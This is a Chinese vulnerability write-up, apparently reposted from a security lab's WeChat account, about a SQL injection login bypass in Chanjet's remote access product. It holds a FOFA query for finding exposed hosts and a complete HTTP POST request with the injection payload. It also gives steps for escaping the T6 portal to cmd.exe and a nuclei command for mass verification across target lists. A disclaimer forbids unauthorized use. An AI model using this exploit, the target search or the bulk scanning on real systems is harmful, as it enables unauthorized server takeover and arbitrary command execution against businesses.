0x01 漏洞描述
畅捷通远程通,是一款稳定、安全、快捷的远程接入产品,用户可以随时随地通过互联网轻松访问部署在企业内部的信息系统。畅捷通远程通系统存在SQL注入漏洞,攻击者通过漏洞可以任意登录服务器,登录系统执行命令,导致服务器失陷。
0x02 漏洞复现
fofa:body="远程通CHANJET_Remote"
1.username执行注入payload,%22'%20or%201%3d1%3b%22,即可通过sql注入登录系统
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: x.x.x.x:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Length: 76
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
X-Requested-With: XMLHttpRequest
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
2.部分系统存在桌面插件,点击桌面即可得到administrator管理员权限
3.后续T6利用,通过sql注入进入系统,显示T6企业门户
5.进入供应链→销售管理→销售选项
6.选中防伪税控输出文件路径
7.随便选中一个文件,右键打开方式→选中默认打开方式→在这台电脑上查找其它应用
8. 最后找到windows文件夹下的system32文件夹中的cmd.exe,运行发现可执行任意命令
9.nuclei批量验证脚本已发表于知识星球(存在较多资产)
nuclei.exe -t chanjet_user_sql.yaml -l subs.txt -stats
(注:本文章为技术分享,禁止任何非授权攻击行为)
长按二维码识别进入
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):畅捷通远程通 sql注入漏洞(未公布)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论